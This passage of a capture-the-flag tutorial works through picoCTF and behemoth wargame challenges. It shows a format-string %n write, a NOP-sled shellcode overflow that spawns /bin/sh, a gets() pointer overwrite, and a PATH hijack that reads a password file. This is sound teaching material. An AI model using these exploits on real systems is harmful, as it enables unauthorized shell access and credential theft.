<p>So we found our A’s again, but they aren’t aligned on the stack. Lets add two more A’s at the end to see if we can get it to line up.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>for i in {1..256};do echo -n &quot;Offset: $i:&quot;; env -i ./format AAAA%$i\$x%1333uAA;echo ;done | grep 41414141
Offset: 103:AAAA41414141
</pre></div>
</div>
<p>It looks like the address 0x0804a030 is getting placed in *ptr. That’s the address we need to use in place of our A’s. In order to place the number 1337 into secret’s memory address, we need to use the %n modifier. (%103$n will look at the data located at offset 103 as a memory address, and write the total number of bytes we have written so far into that address.)</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>pico1139@shell:/home/format$: env -i ./format $:`(python -c &#39;print &quot;\x30\xa0\x04\x08&quot;+&quot;%1333u%103`\ nAA&quot;&#39;)
$ id
uid=11066(pico1139) gid=1008(format) groups=1017(picogroup) $ ls
Makefile flag.txt format format.c $ cat flag.txt
who\_thought\_%n\_was\_a\_good\_idea?
</pre></div>
</div>
<p>Otherwise as the address at the seventh is already present on stack we can also do</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>plain pico83515@shell:/home/format$ ./format &quot;%1337u%7$n&quot;
</pre></div>
</div>
<p>We used DMA to access the memory, so written 1337 directly at the address pointed by the 7th position. Otherwise, we can use the basic</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="o">./</span><span class="nb">format</span> <span class="o">%</span><span class="mi">08</span><span class="n">x</span><span class="o">.%</span><span class="mi">08</span><span class="n">x</span><span class="o">.%</span><span class="mi">08</span><span class="n">x</span><span class="o">.%</span><span class="mi">08</span><span class="n">x</span><span class="o">.%</span><span class="mi">08</span><span class="n">x</span><span class="o">.%</span><span class="mi">1292</span><span class="n">u</span><span class="o">%</span><span class="n">n</span>
</pre></div>
</div>
<p>If you see, we did 5 stack pop-up by using %08x, written the value to be written at 6th position and 7th position contains the address of secret. If you further see &#8220;%08x.&#8221; is of eight characters + 1 of &#8221;.&#8221; or 9 bytes, used five times i.e 9*5=45 bytes and 1292+45 == 1337.</p>
</div></blockquote>
<ul class="simple">
<li>In another example below,</li>
</ul>
<blockquote>
<div><div class="code c highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdlib.h&gt;</span>
<span class="c1">#include &lt;stdio.h&gt;</span>
<span class="c1">#include &lt;unistd.h&gt;</span>

<span class="c1">#define BUFSIZE 256</span>

<span class="n">void</span> <span class="n">greet</span><span class="p">(</span><span class="nb">int</span> <span class="n">length</span><span class="p">){</span>
    <span class="n">char</span> <span class="n">buf</span><span class="p">[</span><span class="n">BUFSIZE</span><span class="p">];</span>
    <span class="n">puts</span><span class="p">(</span><span class="s2">&quot;What is your name?&quot;</span><span class="p">);</span>
    <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">length</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Hello, </span><span class="si">%s</span><span class="se">\n</span><span class="s2">!&quot;</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>

<span class="n">void</span> <span class="n">be_nice_to_people</span><span class="p">(){</span>
    <span class="n">gid_t</span> <span class="n">gid</span> <span class="o">=</span> <span class="n">getegid</span><span class="p">();</span>
    <span class="n">setresgid</span><span class="p">(</span><span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">);</span>
<span class="p">}</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">){</span>
    <span class="nb">int</span> <span class="n">length</span><span class="p">;</span>
    <span class="n">be_nice_to_people</span><span class="p">();</span>

    <span class="n">puts</span><span class="p">(</span><span class="s2">&quot;How long is your name?&quot;</span><span class="p">);</span>
    <span class="n">scanf</span><span class="p">(</span><span class="s2">&quot;</span><span class="si">%d</span><span class="s2">&quot;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">length</span><span class="p">);</span>

    <span class="k">if</span><span class="p">(</span><span class="n">length</span> <span class="o">&lt;</span> <span class="n">BUFSIZE</span><span class="p">)</span> <span class="o">//</span><span class="n">don</span><span class="s1">&#39;t allow buffer overflow</span>
        <span class="n">greet</span><span class="p">(</span><span class="n">length</span><span class="p">);</span>
    <span class="k">else</span>
        <span class="n">puts</span><span class="p">(</span><span class="s2">&quot;Length was too long!&quot;</span><span class="p">);</span>
<span class="p">}</span>
</pre></div>
</div>
<p>This program tries to prevent buffer overflows by first asking for the input length. It disregards the rest of the ouput. However, the program uses scanf. If we supply -1 as the length, we can bypass the overflow check: readelf -l no_overflow can be used to find if there&#8217;s any protection on the binary. Stack is executable, Furthermore, ASLR is not enabled. This makes it easy to stick in a shellcode plus a NOP sled and return to an address on the stack</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>pico1139@shell:/home/no_overflow$ (echo -1; python -c &#39;print &quot;A&quot;*268+&quot;\xd0\xd6\xff\xff&quot;+&quot;\x90&quot;*200+&quot; &quot;\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80&quot;&#39;; cat) | ./no_overflow
How long is your name?
What is your name?
Hello, AAAAAAAAAAAAAAAAAAAAAA...snip...

id
uid=11066(pico1139) gid=1007(no_overflow) groups=1017(picogroup)
cat flag.txt
what_is_your_sign
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>In an another example where stack is not executable, If you read the code, you would find, we need to change the file_name from not_the_flag.txt to flag.txt. In this example, they provided the address of the string &#8220;not_the_flag.txt&#8221; as 0x08048777. By putting a break point in puts in gdb and looking for the address of flag.txt.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">br</span> <span class="o">*</span><span class="n">puts</span>
<span class="n">Breakpoint</span> <span class="mi">1</span> <span class="n">at</span> <span class="mh">0x8048460</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">run</span>
<span class="n">Starting</span> <span class="n">program</span><span class="p">:</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">what_the_flag</span><span class="o">/</span><span class="n">what_the_flag</span>

<span class="n">Breakpoint</span> <span class="mi">1</span><span class="p">,</span> <span class="mh">0xf7e81ee0</span> <span class="ow">in</span> <span class="n">puts</span> <span class="p">()</span> <span class="kn">from</span> <span class="o">/</span><span class="n">lib</span><span class="o">/</span><span class="n">i386</span><span class="o">-</span><span class="n">linux</span><span class="o">-</span><span class="n">gnu</span><span class="o">/</span><span class="n">libc</span><span class="o">.</span><span class="n">so</span><span class="o">.</span><span class="mi">6</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">x</span><span class="o">/</span><span class="n">s</span> <span class="mh">0x08048777</span>
<span class="mh">0x8048777</span><span class="p">:</span>  <span class="s2">&quot;not_the_flag.txt&quot;</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">x</span><span class="o">/</span><span class="n">s</span> <span class="mh">0x08048778</span>
<span class="mh">0x8048778</span><span class="p">:</span>  <span class="s2">&quot;ot_the_flag.txt&quot;</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">x</span><span class="o">/</span><span class="n">s</span> <span class="mh">0x08048770</span>
<span class="mh">0x8048770</span><span class="p">:</span>  <span class="s2">&quot;le: </span><span class="si">%s</span><span class="s2">&quot;</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">x</span><span class="o">/</span><span class="n">s</span> <span class="mh">0x0804877C</span>
<span class="mh">0x804877c</span><span class="p">:</span>  <span class="s2">&quot;he_flag.txt&quot;</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">x</span><span class="o">/</span><span class="n">s</span> <span class="mh">0x0804877D</span>
<span class="mh">0x804877d</span><span class="p">:</span>  <span class="s2">&quot;e_flag.txt&quot;</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">x</span><span class="o">/</span><span class="n">s</span> <span class="mh">0x0804877E</span>
<span class="mh">0x804877e</span><span class="p">:</span>  <span class="s2">&quot;_flag.txt&quot;</span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">x</span><span class="o">/</span><span class="n">s</span> <span class="mh">0x0804877F</span>
<span class="mh">0x804877f</span><span class="p">:</span>  <span class="s2">&quot;flag.txt&quot;</span>
</pre></div>
</div>
<div class="code c highlight-default"><div class="highlight"><pre><span></span>#include &lt;stdlib.h&gt;
#include &lt;stdio.h&gt;

struct message_data{
    char message[128];
    char password[16];
    char *file_name;
};

void read_file(char *buf, char *file_path, size_t len){
    FILE *file;
    if(file= fopen(file_path, &quot;r&quot;)){
        fgets(buf, len, file);
        fclose(file);
    }else{
        sprintf(buf, &quot;Cannot read file: %s&quot;, file_path);
    }
}

int main(int argc, char **argv){
    struct message_data data;
    data.file_name = &quot;not_the_flag.txt&quot;;

    puts(&quot;Enter your password too see the message:&quot;);
    gets(data.password);

    if(!strcmp(data.password, &quot;1337_P455W0RD&quot;)){
        read_file(data.message, data.file_name, sizeof(data.message));
        puts(data.message);
    }else{
        puts(&quot;Incorrect password!&quot;);
    }

    return 0;
}
</pre></div>
</div>
<p>So we’ll ovewrite the file pointer with 0x804877f to make it read flag.txt. From gets()’s manual: gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte (‘\0’). No check for buffer overrun is performed (see BUGS below). So by using the following input, we can overwrite the file pointer and still provide the correct password:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="mi">1337</span><span class="n">_P455W0RD</span>
<span class="mi">1337</span><span class="n">_P455W0RD</span>\<span class="mi">0</span><span class="n">aa</span>\<span class="n">x7f</span>\<span class="n">x87</span>\<span class="n">x04</span>\<span class="n">x08</span>
<span class="n">aa</span>\<span class="n">x7f</span>\<span class="n">x87</span>\<span class="n">x04</span>\<span class="n">x08</span>
</pre></div>
</div>
<p>We use this in the command line to get the flag</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>pico83515@shell:/home/what_the_flag$ printf &quot;1337_P455W0RD\0bb\x7f\x87\x04\x08&quot; | ./what_the_flag
Enter your password too see the message:
Congratulations! Here is the flag: who_needs_%eip

pico83515@shell:/home/what_the_flag$
</pre></div>
</div>
</div></blockquote>
</div>
<div class="section" id="miscellanous-examples">
<h2>Miscellanous Examples<a class="headerlink" href="#miscellanous-examples" title="Permalink to this headline">¶</a></h2>
<p>Let&#8217;s see some miscellanous examples away from Buffer/Format Vulnerabilities.</p>
<ul class="simple">
<li>So, we have a binary which when executed gives</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span>behemoth2@melinda:/behemoth$ ./behemoth2
touch: cannot touch &#39;13373&#39;: Permission denied
</pre></div>
</div>
<p>Let&#8217;s see what ltrace provides us</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>behemoth2@melinda:/behemoth$ ltrace ./behemoth2
__libc_start_main(0x804856d, 1, 0xffffd794, 0x8048640 &lt;unfinished ...&gt;
getpid()                                                                                                               = 14118
sprintf(&quot;touch 14118&quot;, &quot;touch %d&quot;, 14118)                                                                              = 11
__lxstat(3, &quot;14118&quot;, 0xffffd688)                                                                                       = -1
unlink(&quot;14118&quot;)                                                                                                        = -1
system(&quot;touch 14118&quot;touch: cannot touch &#39;14118&#39;: Permission denied
 &lt;no return ...&gt;
--- SIGCHLD (Child exited) ---
&lt;... system resumed&gt; )                                                                                                 = 256
sleep(2000
</pre></div>
</div>
<p>Let&#8217;s see a truncated output of disassemble main, if we see getpid gets the binary pid, sprintf something in some buffer, lstat provides thefile status, unlink -call the unlink function to remove the specified file.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">disassemble</span> <span class="n">main</span>
<span class="n">Dump</span> <span class="n">of</span> <span class="n">assembler</span> <span class="n">code</span> <span class="k">for</span> <span class="n">function</span> <span class="n">main</span><span class="p">:</span>
   <span class="mh">0x08048588</span> <span class="o">&lt;+</span><span class="mi">27</span><span class="o">&gt;</span><span class="p">:</span>    <span class="n">call</span>   <span class="mh">0x8048410</span> <span class="o">&lt;</span><span class="n">getpid</span><span class="nd">@plt</span><span class="o">&gt;</span>
   <span class="mh">0x080485b3</span> <span class="o">&lt;+</span><span class="mi">70</span><span class="o">&gt;</span><span class="p">:</span>    <span class="n">call</span>   <span class="mh">0x8048450</span> <span class="o">&lt;</span><span class="n">sprintf</span><span class="nd">@plt</span><span class="o">&gt;</span>
   <span class="mh">0x080485c7</span> <span class="o">&lt;+</span><span class="mi">90</span><span class="o">&gt;</span><span class="p">:</span>    <span class="n">call</span>   <span class="mh">0x80486c0</span> <span class="o">&lt;</span><span class="n">lstat</span><span class="o">&gt;</span>
   <span class="mh">0x080485df</span> <span class="o">&lt;+</span><span class="mi">114</span><span class="o">&gt;</span><span class="p">:</span>   <span class="n">call</span>   <span class="mh">0x8048400</span> <span class="o">&lt;</span><span class="n">unlink</span><span class="nd">@plt</span><span class="o">&gt;</span>
   <span class="mh">0x080485eb</span> <span class="o">&lt;+</span><span class="mi">126</span><span class="o">&gt;</span><span class="p">:</span>   <span class="n">call</span>   <span class="mh">0x8048420</span> <span class="o">&lt;</span><span class="n">system</span><span class="nd">@plt</span><span class="o">&gt;</span>
   <span class="mh">0x080485f7</span> <span class="o">&lt;+</span><span class="mi">138</span><span class="o">&gt;</span><span class="p">:</span>   <span class="n">call</span>   <span class="mh">0x80483e0</span> <span class="o">&lt;</span><span class="n">sleep</span><span class="nd">@plt</span><span class="o">&gt;</span>
   <span class="mh">0x08048616</span> <span class="o">&lt;+</span><span class="mi">169</span><span class="o">&gt;</span><span class="p">:</span>   <span class="n">call</span>   <span class="mh">0x8048420</span> <span class="o">&lt;</span><span class="n">system</span><span class="nd">@plt</span><span class="o">&gt;</span>
   <span class="mh">0x08048635</span> <span class="o">&lt;+</span><span class="mi">200</span><span class="o">&gt;</span><span class="p">:</span>   <span class="n">leave</span>
   <span class="mh">0x08048636</span> <span class="o">&lt;+</span><span class="mi">201</span><span class="o">&gt;</span><span class="p">:</span>   <span class="n">ret</span>
</pre></div>
</div>
<p>If you check the ltrace output</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">system</span><span class="p">(</span><span class="s2">&quot;touch 14118&quot;</span><span class="n">touch</span><span class="p">:</span> <span class="n">cannot</span> <span class="n">touch</span> <span class="s1">&#39;14118&#39;</span><span class="p">:</span> <span class="n">Permission</span> <span class="n">denied</span>
</pre></div>
</div>
<p>touch is being called without an absolute path, so we can take advantage of that. First we’ll create our own touch script that prints out the contents /etc/behemoth_pass/behemoth3. Next, the PATH variable needs to be updated so that it looks at the current working directory first to ensure that our touch script is executed and not the actual touch program. PATH=/tmp:$PATH, you set /tmp to your primary location to search for binaries and the like... so if you create a file in /tmp/ called touch, it&#8217;ll actually execute that instead of /usr/bin/touch</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>behemoth2@melinda:/tmp/rahul2$ cat touch
cat /etc/behemoth_pass/behemoth3
behemoth2@melinda:/tmp/rahul2$ history | grep PATH
19  history | grep PATH
behemoth2@melinda:/tmp/rahul2$ PATH=/tmp/rahul2:$PATH /behemoth/behemoth2
**********
</pre></div>
</div>
</div></blockquote>
</div>
</div>


          </div>
        </div>
      </div>
      <div class="clearer"></div>
    </div>
    <div class="related" role="navigation" aria-label="related navigation">
      <h3>Navigation</h3>
      <ul>
        <li class="right" style="margin-right: 10px">
          <a href="LFCForensics.html" title="Learning from the CTF : Forensics"
             >next</a></li>
        <li class="right" >
          <a href="LFCReverseEngineering.html" title="Learning from the CTF : Reverse Engineering"
             >previous</a> |</li>
        <li class="nav-item nav-item-0"><a href="index.html">tech.bitvijays.com</a> &#187;</li> 
      </ul>
    </div>
    <div class="footer" role="contentinfo">
        &#169; Copyright 2017, Vijay Kumar.
    </div>
  </body>
</html>